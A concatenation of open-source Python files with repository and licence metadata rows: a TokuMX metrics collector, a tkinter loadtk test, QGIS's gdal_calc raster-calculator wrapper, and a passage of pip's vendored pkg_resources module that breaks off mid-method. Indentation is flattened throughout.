local_rate = LocalRate(self, metric_name, tags)
self.idx_rates[key] = local_rate
else:
local_rate = self.idx_rates[key]
local_rate.submit(value)
def collect_mongos(self, server, conn, db, tags):
tags.append('role:mongos')
config = conn['config']
agg_result = config['chunks'].aggregate([{'$group': {'_id': {'ns': '$ns', 'shard': '$shard'}, 'count': {'$sum': 1}}}])
if agg_result['ok']:
for doc in agg_result['result']:
chunk_tags = list(tags)
parts = doc['_id']['ns'].split('.', 1)
chunk_tags.append('db:%s' % parts[0])
chunk_tags.append('coll:%s' % parts[1])
chunk_tags.append('shard:%s' % doc['_id']['shard'])
shard_doc = config['shards'].find_one(doc['_id']['shard'])
host_parts = shard_doc['host'].split('/', 1)
if len(host_parts) == 2:
chunk_tags.append('replset:%s' % host_parts[0])
self.gauge('tokumx.sharding.chunks', doc['count'], tags=chunk_tags)
def collect_metrics(self, instance, server, conn, db, tags):
status = db["$cmd"].find_one({"serverStatus": 1})
status['stats'] = db.command('dbstats')
# Handle replica data, if any
# See http://www.mongodb.org/display/DOCS/Replica+Set+Commands#ReplicaSetCommands-replSetGetStatus
conn, db = self._get_replica_metrics(instance, conn, db, tags, server, status)
for dbname in conn.database_names():
db_tags = list(tags)
db_tags.append('db:%s' % dbname)
db = conn[dbname]
stats = db.command('dbstats')
for m, v in stats.items():
if m in ['db', 'ok']:
continue
m = 'stats.db.%s' % m
m = self.normalize(m, 'tokumx')
# FIXME: here tokumx.stats.db.* are potentially unbounded
self.gauge(m, v, db_tags)
for collname in db.collection_names(False):
stats = db.command('collStats', collname)
for m, v in stats.items():
if m in ['db', 'ok']:
continue
if m == 'indexDetails':
for idx_stats in v:
for k in ['count', 'size', 'avgObjSize', 'storageSize']:
value = idx_stats[k]
if type(value) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.idx.%s' % k, idx_stats[k], tags=db_tags)
for k in ['queries', 'nscanned', 'nscannedObjects', 'inserts', 'deletes']:
key = (dbname, collname, idx_stats['name'], k)
self.submit_idx_rate('tokumx.statsd.idx.%s' % k, idx_stats[k], tags=db_tags, key=key)
# FIXME: here tokumx.stats.coll.* are potentially unbounded
elif type(v) in (types.IntType, types.LongType, types.FloatType):
self.histogram('tokumx.stats.coll.%s' % m, v, db_tags)
# If these keys exist, remove them for now as they cannot be serialized
try:
status['backgroundFlushing'].pop('last_finished')
except KeyError:
pass
try:
status.pop('localTime')
except KeyError:
pass
# Go through the metrics and save the values
for m in self.METRICS:
# each metric is of the form: x.y.z with z optional
# and can be found at status[x][y][z]
value = status
try:
for c in m.split("."):
value = value[c]
except KeyError:
continue
# value is now status[x][y][z]
if type(value) == bson.int64.Int64:
value = long(value)
else:
if type(value) not in (types.IntType, types.LongType, types.FloatType):
self.log.warning("Value found that is not of type int, int64,long, or float")
# Check if metric is a gauge or rate
if m in self.GAUGES:
self.gauge('tokumx.%s' % m, value, tags=tags)
if m in self.RATES:
self.rate('tokumx.%sps' % m, value, tags=tags)
def check(self, instance):
server, conn, db, tags = self._get_connection(instance)
if conn.is_mongos:
self.collect_mongos(server, conn, db, tags)
else:
self.collect_metrics(instance, server, conn, db, tags)
| bsd-3-clause |
paweljasinski/ironpython3 | Src/StdLib/Lib/tkinter/test/test_tkinter/test_loadtk.py | 162 | 1503 | import os
import sys
import unittest
import test.support as test_support
from tkinter import Tcl, TclError
test_support.requires('gui')
class TkLoadTest(unittest.TestCase):
@unittest.skipIf('DISPLAY' not in os.environ, 'No $DISPLAY set.')
def testLoadTk(self):
tcl = Tcl()
self.assertRaises(TclError,tcl.winfo_geometry)
tcl.loadtk()
self.assertEqual('1x1+0+0', tcl.winfo_geometry())
tcl.destroy()
def testLoadTkFailure(self):
old_display = None
if sys.platform.startswith(('win', 'darwin', 'cygwin')):
# no failure possible on windows?
# XXX Maybe on tk older than 8.4.13 it would be possible,
# see tkinter.h.
return
with test_support.EnvironmentVarGuard() as env:
if 'DISPLAY' in os.environ:
del env['DISPLAY']
# on some platforms, deleting environment variables
# doesn't actually carry through to the process level
# because they don't support unsetenv
# If that's the case, abort.
with os.popen('echo $DISPLAY') as pipe:
display = pipe.read().strip()
if display:
return
tcl = Tcl()
self.assertRaises(TclError, tcl.winfo_geometry)
self.assertRaises(TclError, tcl.loadtk)
tests_gui = (TkLoadTest, )
if __name__ == "__main__":
test_support.run_unittest(*tests_gui)
| apache-2.0 |
CS-SI/QGIS | python/plugins/processing/algs/gdal/gdalcalc.py | 7 | 7588 | # -*- coding: utf-8 -*-
"""
***************************************************************************
gdalcalc.py
---------------------
Date : Janaury 2015
Copyright : (C) 2015 by Giovanni Manghi
Email : giovanni dot manghi at naturalgis dot pt
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Giovanni Manghi'
__date__ = 'January 2015'
__copyright__ = '(C) 2015, Giovanni Manghi'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from processing.algs.gdal.GdalAlgorithm import GdalAlgorithm
from processing.algs.gdal.GdalUtils import GdalUtils
from processing.tools.system import isWindows
class gdalcalc(GdalAlgorithm):
INPUT_A = 'INPUT_A'
INPUT_B = 'INPUT_B'
INPUT_C = 'INPUT_C'
INPUT_D = 'INPUT_D'
INPUT_E = 'INPUT_E'
INPUT_F = 'INPUT_F'
BAND_A = 'BAND_A'
BAND_B = 'BAND_B'
BAND_C = 'BAND_C'
BAND_D = 'BAND_D'
BAND_E = 'BAND_E'
BAND_F = 'BAND_F'
FORMULA = 'FORMULA'
OUTPUT = 'OUTPUT'
NO_DATA = 'NO_DATA'
EXTRA = 'EXTRA'
RTYPE = 'RTYPE'
TYPE = ['Byte', 'Int16', 'UInt16', 'UInt32', 'Int32', 'Float32', 'Float64']
#DEBUG = 'DEBUG'
def __init__(self):
super().__init__()
def initAlgorithm(self, config=None):
self.addParameter(ParameterRaster(
self.INPUT_A, self.tr('Input layer A'), False))
self.addParameter(ParameterString(self.BAND_A,
self.tr('Number of raster band for raster A'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_B, self.tr('Input layer B'), True))
self.addParameter(ParameterString(self.BAND_B,
self.tr('Number of raster band for raster B'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_C, self.tr('Input layer C'), True))
self.addParameter(ParameterString(self.BAND_C,
self.tr('Number of raster band for raster C'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_D, self.tr('Input layer D'), True))
self.addParameter(ParameterString(self.BAND_D,
self.tr('Number of raster band for raster D'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_E, self.tr('Input layer E'), True))
self.addParameter(ParameterString(self.BAND_E,
self.tr('Number of raster band for raster E'), '1', optional=True))
self.addParameter(ParameterRaster(
self.INPUT_F, self.tr('Input layer F'), True))
self.addParameter(ParameterString(self.BAND_F,
self.tr('Number of raster band for raster F'), '1', optional=True))
self.addParameter(ParameterString(self.FORMULA,
self.tr('Calculation in gdalnumeric syntax using +-/* or any numpy array functions (i.e. logical_and())'), 'A*2', optional=False))
self.addParameter(ParameterString(self.NO_DATA,
self.tr('Set output nodata value'), '', optional=True))
self.addParameter(ParameterSelection(self.RTYPE,
self.tr('Output raster type'), self.TYPE, 5))
#self.addParameter(ParameterBoolean(
# self.DEBUG, self.tr('Print debugging information'), False))
self.addParameter(ParameterString(self.EXTRA,
self.tr('Additional creation parameters'), '', optional=True))
self.addOutput(OutputRaster(self.OUTPUT, self.tr('Calculated')))
def name(self):
return 'rastercalculator'
def displayName(self):
return self.tr('Raster calculator')
def group(self):
return self.tr('Raster miscellaneous')
def groupId(self):
return 'rastermiscellaneous'
def getConsoleCommands(self, parameters, context, feedback, executing=True):
out = self.getOutputValue(self.OUTPUT)
extra = self.getParameterValue(self.EXTRA)
if extra is not None:
extra = str(extra)
#debug = self.getParameterValue(self.DEBUG)
formula = self.getParameterValue(self.FORMULA)
noData = self.getParameterValue(self.NO_DATA)
if noData is not None:
noData = str(noData)
arguments = []
arguments.append('--calc')
arguments.append('"' + formula + '"')
arguments.append('--format')
arguments.append(GdalUtils.getFormatShortNameFromFilename(out))
arguments.append('--type')
arguments.append(self.TYPE[self.getParameterValue(self.RTYPE)])
if noData and len(noData) > 0:
arguments.append('--NoDataValue')
arguments.append(noData)
if extra and len(extra) > 0:
arguments.append(extra)
#if debug:
# arguments.append('--debug')
arguments.append('-A')
arguments.append(self.getParameterValue(self.INPUT_A))
if self.getParameterValue(self.BAND_A):
arguments.append('--A_band ' + self.getParameterValue(self.BAND_A))
if self.getParameterValue(self.INPUT_B):
arguments.append('-B')
arguments.append(self.getParameterValue(self.INPUT_B))
if self.getParameterValue(self.BAND_B):
arguments.append('--B_band ' + self.getParameterValue(self.BAND_B))
if self.getParameterValue(self.INPUT_C):
arguments.append('-C')
arguments.append(self.getParameterValue(self.INPUT_C))
if self.getParameterValue(self.BAND_C):
arguments.append('--C_band ' + self.getParameterValue(self.BAND_C))
if self.getParameterValue(self.INPUT_D):
arguments.append('-D')
arguments.append(self.getParameterValue(self.INPUT_D))
if self.getParameterValue(self.BAND_D):
arguments.append('--D_band ' + self.getParameterValue(self.BAND_D))
if self.getParameterValue(self.INPUT_E):
arguments.append('-E')
arguments.append(self.getParameterValue(self.INPUT_E))
if self.getParameterValue(self.BAND_E):
arguments.append('--E_band ' + self.getParameterValue(self.BAND_E))
if self.getParameterValue(self.INPUT_F):
arguments.append('-F')
arguments.append(self.getParameterValue(self.INPUT_F))
if self.getParameterValue(self.BAND_F):
arguments.append('--F_band ' + self.getParameterValue(self.BAND_F))
arguments.append('--outfile')
arguments.append(out)
if isWindows():
return ['gdal_calc', GdalUtils.escapeAndJoin(arguments)]
else:
return ['gdal_calc.py', GdalUtils.escapeAndJoin(arguments)]
| gpl-2.0 |
wkeyword/pip | pip/_vendor/pkg_resources/__init__.py | 252 | 106466 | """
Package resource API
--------------------
A resource is a logical file contained within a package, or a logical
subdirectory thereof. The package resource API expects resource names
to have their path parts separated with ``/``, *not* whatever the local
path separator is. Do not use os.path operations to manipulate resource
names being passed into the API.
The package resource API is designed to work with normal filesystem packages,
.egg files, and unpacked .egg files. It can also work in a limited way with
.zip files and with custom PEP 302 loaders that support the ``get_data()``
method.
"""
from __future__ import absolute_import
import sys
import os
import io
import time
import re
import types
import zipfile
import zipimport
import warnings
import stat
import functools
import pkgutil
import token
import symbol
import operator
import platform
import collections
import plistlib
import email.parser
import tempfile
import textwrap
from pkgutil import get_importer
try:
import _imp
except ImportError:
# Python 3.2 compatibility
import imp as _imp
PY3 = sys.version_info > (3,)
PY2 = not PY3
if PY3:
from urllib.parse import urlparse, urlunparse
if PY2:
from urlparse import urlparse, urlunparse
if PY3:
string_types = str,
else:
string_types = str, eval('unicode')
iteritems = (lambda i: i.items()) if PY3 else lambda i: i.iteritems()
# capture these to bypass sandboxing
from os import utime
try:
from os import mkdir, rename, unlink
WRITE_SUPPORT = True
except ImportError:
# no write support, probably under GAE
WRITE_SUPPORT = False
from os import open as os_open
from os.path import isdir, split
# Avoid try/except due to potential problems with delayed import mechanisms.
if sys.version_info >= (3, 3) and sys.implementation.name == "cpython":
import importlib.machinery as importlib_machinery
else:
importlib_machinery = None
try:
import parser
except ImportError:
pass
import pip._vendor.packaging.version
import pip._vendor.packaging.specifiers
packaging = pip._vendor.packaging
# declare some globals that will be defined later to
# satisfy the linters.
require = None
working_set = None
class PEP440Warning(RuntimeWarning):
"""
Used when there is an issue with a version or specifier not complying with
PEP 440.
"""
class _SetuptoolsVersionMixin(object):
def __hash__(self):
return super(_SetuptoolsVersionMixin, self).__hash__()
def __lt__(self, other):
if isinstance(other, tuple):
return tuple(self) < other
else:
return super(_SetuptoolsVersionMixin, self).__lt__(other)
def __le__(self, other):
if isinstance(other, tuple):
return tuple(self) <= other
else:
return super(_SetuptoolsVersionMixin, self).__le__(other)
def __eq__(self, other):
if isinstance(other, tuple):
return tuple(self) == other
else:
return super(_SetuptoolsVersionMixin, self).__eq__(other)
def __ge__(self, other):
if isinstance(other, tuple):
return tuple(self) >= other
else:
return super(_SetuptoolsVersionMixin, self).__ge__(other)
def __gt__(self, other):
if isinstance(other, tuple):
return tuple(self) > other
else:
return super(_SetuptoolsVersionMixin, self).__gt__(other)
def __ne__(self, other):
if isinstance(other, tuple):
return tuple(self) != other
else:
return super(_SetuptoolsVersionMixin, self).__ne__(other)
def __getitem__(self, key):
return tuple(self)[key]
def __iter__(self):
component_re = re.compile(r'(\d+ | [a-z]+ | \.| -)', re.VERBOSE)
replace = {
'pre': 'c',
'preview': 'c',
'-': 'final-',
'rc': 'c',
'dev': '@',
}.get
def _parse_version_parts(s):
for part in component_re.split(s):
part = replace(part, part)
if not part or part == '.':
continue
if part[:1] in '0123456789':
# pad for numeric comparison
yield part.zfill(8)
else:
yield '*'+part
# ensure that alpha/beta/candidate are before final
yield '*final'
def old_parse_version(s):
parts = []
for part in _parse_version_parts(s.lower()):
if part.startswith('*'):
# remove '-' before a prerelease tag
if part < '*final':
while parts and parts[-1] == '*final-':
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == '00000000':
parts.pop()
parts.append(part)
return tuple(parts)
# Warn for use of this function
warnings.warn(
"You have iterated over the result of "
"pkg_resources.parse_version. This is a legacy behavior which is "
"inconsistent with the new version class introduced in setuptools "
"8.0. In most cases, conversion to a tuple is unnecessary. For "
"comparison of versions, sort the Version instances directly. If "
"you have another use case requiring the tuple, please file a "
"bug with the setuptools project describing that need.",
RuntimeWarning,
stacklevel=1,
)
for part in old_parse_version(str(self)):
yield part
class SetuptoolsVersion(_SetuptoolsVersionMixin, packaging.version.Version):
pass
class SetuptoolsLegacyVersion(_SetuptoolsVersionMixin,
packaging.version.LegacyVersion):
pass
def parse_version(v):
try:
return SetuptoolsVersion(v)
except packaging.version.InvalidVersion:
return SetuptoolsLegacyVersion(v)
_state_vars = {}
def _declare_state(vartype, **kw):
globals().update(kw)
_state_vars.update(dict.fromkeys(kw, vartype))
def __getstate__():
state = {}
g = globals()
for k, v in _state_vars.items():
state[k] = g['_sget_'+v](g[k])
return state
def __setstate__(state):
g = globals()
for k, v in state.items():
g['_sset_'+_state_vars[k]](k, g[k], v)
return state
def _sget_dict(val):
return val.copy()
def _sset_dict(key, ob, state):
ob.clear()
ob.update(state)
def _sget_object(val):
return val.__getstate__()
def _sset_object(key, ob, state):
ob.__setstate__(state)
_sget_none = _sset_none = lambda *args: None
def get_supported_platform():
"""Return this platform's maximum compatible version.
distutils.util.get_platform() normally reports the minimum version
of Mac OS X that would be required to *use* extensions produced by
distutils. But what we want when checking compatibility is to know the
version of Mac OS X that we are *running*. To allow usage of packages that
explicitly require a newer version of Mac OS X, we must also know the
current version of the OS.
If this condition occurs for any other platform with a version in its
platform strings, this function should be extended accordingly.
"""
plat = get_build_platform()
m = macosVersionString.match(plat)
if m is not None and sys.platform == "darwin":
try:
plat = 'macosx-%s-%s' % ('.'.join(_macosx_vers()[:2]), m.group(3))
except ValueError:
# not Mac OS X
pass
return plat
__all__ = [
# Basic resource access and distribution/entry point discovery
'require', 'run_script', 'get_provider', 'get_distribution',
'load_entry_point', 'get_entry_map', 'get_entry_info',
'iter_entry_points',
'resource_string', 'resource_stream', 'resource_filename',
'resource_listdir', 'resource_exists', 'resource_isdir',
# Environmental control
'declare_namespace', 'working_set', 'add_activation_listener',
'find_distributions', 'set_extraction_path', 'cleanup_resources',
'get_default_cache',
# Primary implementation classes
'Environment', 'WorkingSet', 'ResourceManager',
'Distribution', 'Requirement', 'EntryPoint',
# Exceptions
'ResolutionError', 'VersionConflict', 'DistributionNotFound',
'UnknownExtra', 'ExtractionError',
# Warnings
'PEP440Warning',
# Parsing functions and string utilities
'parse_requirements', 'parse_version', 'safe_name', 'safe_version',
'get_platform', 'compatible_platforms', 'yield_lines', 'split_sections',
'safe_extra', 'to_filename', 'invalid_marker', 'evaluate_marker',
# filesystem utilities
'ensure_directory', 'normalize_path',
# Distribution "precedence" constants
'EGG_DIST', 'BINARY_DIST', 'SOURCE_DIST', 'CHECKOUT_DIST', 'DEVELOP_DIST',
# "Provider" interfaces, implementations, and registration/lookup APIs
'IMetadataProvider', 'IResourceProvider', 'FileMetadata',
'PathMetadata', 'EggMetadata', 'EmptyProvider', 'empty_provider',
'NullProvider', 'EggProvider', 'DefaultProvider', 'ZipProvider',
'register_finder', 'register_namespace_handler', 'register_loader_type',
'fixup_namespace_packages', 'get_importer',
# Deprecated/backward compatibility only
'run_main', 'AvailableDistributions',
]
class ResolutionError(Exception):
"""Abstract base for dependency resolution errors"""
def __repr__(self):
return self.__class__.__name__+repr(self.args)
class VersionConflict(ResolutionError):
"""
An already-installed version conflicts with the requested version.
Should be initialized with the installed Distribution and the requested
Requirement.
"""
_template = "{self.dist} is installed but {self.req} is required"
@property
def dist(self):
return self.args[0]
@property
def req(self):
return self.args[1]
def report(self):
return self._template.format(**locals())
def with_context(self, required_by):
"""
If required_by is non-empty, return a version of self that is a
ContextualVersionConflict.
"""
if not required_by:
return self
args = self.args + (required_by,)
return ContextualVersionConflict(*args)
class ContextualVersionConflict(VersionConflict):
"""
A VersionConflict that accepts a third parameter, the set of the
requirements that required the installed Distribution.
"""
_template = VersionConflict._template + ' by {self.required_by}'
@property
def required_by(self):
return self.args[2]
class DistributionNotFound(ResolutionError):
"""A requested distribution was not found"""
_template = ("The '{self.req}' distribution was not found "
"and is required by {self.requirers_str}")
@property
def req(self):
return self.args[0]
@property
def requirers(self):
return self.args[1]
@property
def requirers_str(self):
if not self.requirers:
return 'the application'
return ', '.join(self.requirers)
def report(self):
return self._template.format(**locals())
def __str__(self):
return self.report()
class UnknownExtra(ResolutionError):
"""Distribution doesn't have an "extra feature" of the given name"""
_provider_factories = {}
PY_MAJOR = sys.version[:3]
EGG_DIST = 3
BINARY_DIST = 2
SOURCE_DIST = 1
CHECKOUT_DIST = 0
DEVELOP_DIST = -1
def register_loader_type(loader_type, provider_factory):
"""Register `provider_factory` to make providers for `loader_type`
`loader_type` is the type or class of a PEP 302 ``module.__loader__``,
and `provider_factory` is a function that, passed a *module* object,
returns an ``IResourceProvider`` for that module.
"""
_provider_factories[loader_type] = provider_factory
def get_provider(moduleOrReq):
"""Return an IResourceProvider for the named module or requirement"""
if isinstance(moduleOrReq, Requirement):
return working_set.find(moduleOrReq) or require(str(moduleOrReq))[0]
try:
module = sys.modules[moduleOrReq]
except KeyError:
__import__(moduleOrReq)
module = sys.modules[moduleOrReq]
loader = getattr(module, '__loader__', None)
return _find_adapter(_provider_factories, loader)(module)
def _macosx_vers(_cache=[]):
if not _cache:
version = platform.mac_ver()[0]
# fallback for MacPorts
if version == '':
plist = '/System/Library/CoreServices/SystemVersion.plist'
if os.path.exists(plist):
if hasattr(plistlib, 'readPlist'):
plist_content = plistlib.readPlist(plist)
if 'ProductVersion' in plist_content:
version = plist_content['ProductVersion']
_cache.append(version.split('.'))
return _cache[0]
def _macosx_arch(machine):
return {'PowerPC': 'ppc', 'Power_Macintosh': 'ppc'}.get(machine, machine)
def get_build_platform():
"""Return this platform's string for platform-specific distributions
XXX Currently this is the same as ``distutils.util.get_platform()``, but it
needs some hacks for Linux and Mac OS X.
"""
try:
# Python 2.7 or >=3.2
from sysconfig import get_platform
except ImportError:
from distutils.util import get_platform
plat = get_platform()
if sys.platform == "darwin" and not plat.startswith('macosx-'):
try:
version = _macosx_vers()
machine = os.uname()[4].replace(" ", "_")
return "macosx-%d.%d-%s" % (int(version[0]), int(version[1]),
_macosx_arch(machine))
except ValueError:
# if someone is running a non-Mac darwin system, this will fall
# through to the default implementation
pass
return plat
macosVersionString = re.compile(r"macosx-(\d+)\.(\d+)-(.*)")
darwinVersionString = re.compile(r"darwin-(\d+)\.(\d+)\.(\d+)-(.*)")
# XXX backward compat
get_platform = get_build_platform
def compatible_platforms(provided, required):
"""Can code for the `provided` platform run on the `required` platform?
Returns true if either platform is ``None``, or the platforms are equal.
XXX Needs compatibility checks for Linux and other unixy OSes.
"""
if provided is None or required is None or provided==required:
# easy case
return True
# Mac OS X special cases
reqMac = macosVersionString.match(required)
if reqMac:
provMac = macosVersionString.match(provided)
# is this a Mac package?
if not provMac:
# this is backwards compatibility for packages built before
# setuptools 0.6. All packages built after this point will
# use the new macosx designation.
provDarwin = darwinVersionString.match(provided)
if provDarwin:
dversion = int(provDarwin.group(1))
macosversion = "%s.%s" % (reqMac.group(1), reqMac.group(2))
if dversion == 7 and macosversion >= "10.3" or \
dversion == 8 and macosversion >= "10.4":
return True
# egg isn't macosx or legacy darwin
return False
# are they the same major version and machine type?
if provMac.group(1) != reqMac.group(1) or \
provMac.group(3) != reqMac.group(3):
return False
# is the required OS major update >= the provided one?
if int(provMac.group(2)) > int(reqMac.group(2)):
return False
return True
# XXX Linux and other platforms' special cases should go here
return False
def run_script(dist_spec, script_name):
"""Locate distribution `dist_spec` and run its `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
require(dist_spec)[0].run_script(script_name, ns)
# backward compatibility
run_main = run_script
def get_distribution(dist):
"""Return a current distribution object for a Requirement or string"""
if isinstance(dist, string_types):
dist = Requirement.parse(dist)
if isinstance(dist, Requirement):
dist = get_provider(dist)
if not isinstance(dist, Distribution):
raise TypeError("Expected string, Requirement, or Distribution", dist)
return dist
def load_entry_point(dist, group, name):
"""Return `name` entry point of `group` for `dist` or raise ImportError"""
return get_distribution(dist).load_entry_point(group, name)
def get_entry_map(dist, group=None):
"""Return the entry point map for `group`, or the full entry map"""
return get_distribution(dist).get_entry_map(group)
def get_entry_info(dist, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return get_distribution(dist).get_entry_info(group, name)
class IMetadataProvider:
def has_metadata(name):
"""Does the package's distribution contain the named metadata?"""
def get_metadata(name):
"""The named metadata resource as a string"""
def get_metadata_lines(name):
"""Yield named metadata resource as list of non-blank non-comment lines
Leading and trailing whitespace is stripped from each line, and lines
with ``#`` as the first non-blank character are omitted."""
def metadata_isdir(name):
"""Is the named metadata a directory? (like ``os.path.isdir()``)"""
def metadata_listdir(name):
"""List of metadata names in the directory (like ``os.listdir()``)"""
def run_script(script_name, namespace):
"""Execute the named script in the supplied namespace dictionary"""
class IResourceProvider(IMetadataProvider):
"""An object that provides access to package resources"""
def get_resource_filename(manager, resource_name):
"""Return a true filesystem path for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_stream(manager, resource_name):
"""Return a readable file-like object for `resource_name`
`manager` must be an ``IResourceManager``"""
def get_resource_string(manager, resource_name):
"""Return a string containing the contents of `resource_name`
`manager` must be an ``IResourceManager``"""
def has_resource(resource_name):
"""Does the package contain the named resource?"""
def resource_isdir(resource_name):
"""Is the named resource a directory? (like ``os.path.isdir()``)"""
def resource_listdir(resource_name):
"""List of resource names in the directory (like ``os.listdir()``)"""
class WorkingSet(object):
"""A collection of active distributions on sys.path (or a similar list)"""
def __init__(self, entries=None):
"""Create working set from list of path entries (default=sys.path)"""
self.entries = []
self.entry_keys = {}
self.by_key = {}
self.callbacks = []
if entries is None:
entries = sys.path
for entry in entries:
self.add_entry(entry)
@classmethod
def _build_master(cls):
"""
Prepare the master working set.
"""
ws = cls()
try:
from __main__ import __requires__
except ImportError:
# The main program does not list any requirements
return ws
# ensure the requirements are met
try:
ws.require(__requires__)
except VersionConflict:
return cls._build_from_requirements(__requires__)
return ws
@classmethod
def _build_from_requirements(cls, req_spec):
"""
Build a working set from a requirement spec. Rewrites sys.path.
"""
# try it without defaults already on sys.path
# by starting with an empty path
ws = cls([])
reqs = parse_requirements(req_spec)
dists = ws.resolve(reqs, Environment())
for dist in dists:
ws.add(dist)
# add any missing entries from sys.path
for entry in sys.path:
if entry not in ws.entries:
ws.add_entry(entry)
# then copy back to sys.path
sys.path[:] = ws.entries
return ws
def add_entry(self, entry):
"""Add a path item to ``.entries``, finding any distributions on it
``find_distributions(entry, True)`` is used to find distributions
corresponding to the path entry, and they are added. `entry` is
always appended to ``.entries``, even if it is already present.
(This is because ``sys.path`` can contain the same value more than
once, and the ``.entries`` of the ``sys.path`` WorkingSet should always
equal ``sys.path``.)
"""
self.entry_keys.setdefault(entry, [])
self.entries.append(entry)
for dist in find_distributions(entry, True):
self.add(dist, entry, False)
def __contains__(self, dist):
"""True if `dist` is the active distribution for its project"""
return self.by_key.get(dist.key) == dist
def find(self, req):
"""Find a distribution matching requirement `req`
If there is an active distribution for the requested project, this
returns it as long as it meets the version requirement specified by
`req`. But, if there is an active distribution for the project and it
does *not* meet the `req` requirement, ``VersionConflict`` is raised.
If there is no active distribution for the requested project, ``None``
is returned.
"""
dist = self.by_key.get(req.key)
if dist is not None and dist not in req:
# XXX add more info
raise VersionConflict(dist, req)
return dist
def iter_entry_points(self, group, name=None):
"""Yield entry point objects from `group` matching `name`
If `name` is None, yields all entry points in `group` from all
distributions in the working set, otherwise only ones matching
both `group` and `name` are yielded (in distribution order).
"""
for dist in self:
entries = dist.get_entry_map(group)
if name is None:
for ep in entries.values():
yield ep
elif name in entries:
yield entries[name]
def run_script(self, requires, script_name):
"""Locate distribution for `requires` and run `script_name` script"""
ns = sys._getframe(1).f_globals
name = ns['__name__']
ns.clear()
ns['__name__'] = name
self.require(requires)[0].run_script(script_name, ns)
def __iter__(self):
"""Yield distributions for non-duplicate projects in the working set
The yield order is the order in which the items' path entries were
added to the working set.
"""
seen = {}
for item in self.entries:
if item not in self.entry_keys:
# workaround a cache issue
continue
for key in self.entry_keys[item]:
if key not in seen:
seen[key]=1
yield self.by_key[key]
def add(self, dist, entry=None, insert=True, replace=False):
"""Add `dist` to working set, associated with `entry`
If `entry` is unspecified, it defaults to the ``.location`` of `dist`.
On exit from this routine, `entry` is added to the end of the working
set's ``.entries`` (if it wasn't already present).
`dist` is only added to the working set if it's for a project that
doesn't already have a distribution in the set, unless `replace=True`.
If it's added, any callbacks registered with the ``subscribe()`` method
will be called.
"""
if insert:
dist.insert_on(self.entries, entry)
if entry is None:
entry = dist.location
keys = self.entry_keys.setdefault(entry,[])
keys2 = self.entry_keys.setdefault(dist.location,[])
if not replace and dist.key in self.by_key:
# ignore hidden distros
return
self.by_key[dist.key] = dist
if dist.key not in keys:
keys.append(dist.key)
if dist.key not in keys2:
keys2.append(dist.key)
self._added_new(dist)
def resolve(self, requirements, env=None, installer=None,
replace_conflicting=False):
"""List all distributions needed to (recursively) meet `requirements`
`requirements` must be a sequence of ``Requirement`` objects. `env`,
if supplied, should be an ``Environment`` instance. If
not supplied, it defaults to all distributions available within any
entry or distribution in the working set. `installer`, if supplied,
will be invoked with each requirement that cannot be met by an
already-installed distribution; it should return a ``Distribution`` or
``None``.
Unless `replace_conflicting=True`, raises a VersionConflict exception if
any requirements are found on the path that have the correct name but
the wrong version. Otherwise, if an `installer` is supplied it will be
invoked to obtain the correct version of the requirement and activate
it.
"""
# set up the stack
requirements = list(requirements)[::-1]
# set of processed requirements
processed = {}
# key -> dist
best = {}
to_activate = []
# Mapping of requirement to set of distributions that required it;
# useful for reporting info about conflicts.
required_by = collections.defaultdict(set)
while requirements:
# process dependencies breadth-first
req = requirements.pop(0)
if req in processed:
# Ignore cyclic or redundant dependencies
continue
dist = best.get(req.key)
if dist is None:
# Find the best distribution and add it to the map
dist = self.by_key.get(req.key)
if dist is None or (dist not in req and replace_conflicting):
ws = self
if env is None:
if dist is None:
env = Environment(self.entries)
else:
# Use an empty environment and workingset to avoid
# any further conflicts with the conflicting
# distribution
env = Environment([])
ws = WorkingSet([])
dist = best[req.key] = env.best_match(req, ws, installer)
if dist is None:
requirers = required_by.get(req, None)
raise DistributionNotFound(req, requirers)
to_activate.append(dist)
if dist not in req:
# Oops, the "best" so far conflicts with a dependency
dependent_req = required_by[req]
raise VersionConflict(dist, req).with_context(dependent_req)
# push the new requirements onto the stack
new_requirements = dist.requires(req.extras)[::-1]
requirements.extend(new_requirements)
# Register the new requirements needed by req
for new_requirement in new_requirements:
required_by[new_requirement].add(req.project_name)
processed[req] = True
# return list of distros to activate
return to_activate
def find_plugins(self, plugin_env, full_env=None, installer=None,
fallback=True):
"""Find all activatable distributions in `plugin_env`
Example usage::
distributions, errors = working_set.find_plugins(
Environment(plugin_dirlist)
)
# add plugins+libs to sys.path
map(working_set.add, distributions)
# display errors
print('Could not load', errors)
The `plugin_env` should be an ``Environment`` instance that contains
only distributions that are in the project's "plugin directory" or
directories. The `full_env`, if supplied, should be an ``Environment``
contains all currently-available distributions. If `full_env` is not
supplied, one is created automatically from the ``WorkingSet`` this
method is called on, which will typically mean that every directory on
``sys.path`` will be scanned for distributions.
`installer` is a standard installer callback as used by the
``resolve()`` method. The `fallback` flag indicates whether we should
attempt to resolve older versions of a plugin if the newest version
cannot be resolved.
This method returns a 2-tuple: (`distributions`, `error_info`), where
`distributions` is a list of the distributions found in `plugin_env`
that were loadable, along with any other distributions that are needed
to resolve their dependencies. `error_info` is a dictionary mapping
unloadable plugin distributions to an exception instance describing the
error that occurred. Usually this will be a ``DistributionNotFound`` or
``VersionConflict`` instance.
"""
plugin_projects = list(plugin_env)
# scan project names in alphabetic order
plugin_projects.sort()
error_info = {}
distributions = {}
if full_env is None:
env = Environment(self.entries)
env += plugin_env
else:
env = full_env + plugin_env
shadow_set = self.__class__([])
# put all our entries in shadow_set
list(map(shadow_set.add, self))
for project_name in plugin_projects:
for dist in plugin_env[project_name]:
req = [dist.as_requirement()]
try:
resolvees = shadow_set.resolve(req, env, installer)
except ResolutionError as v:
# save error info
error_info[dist] = v
if fallback:
# try the next older version of project
continue
else:
# give up on this project, keep going
break
else:
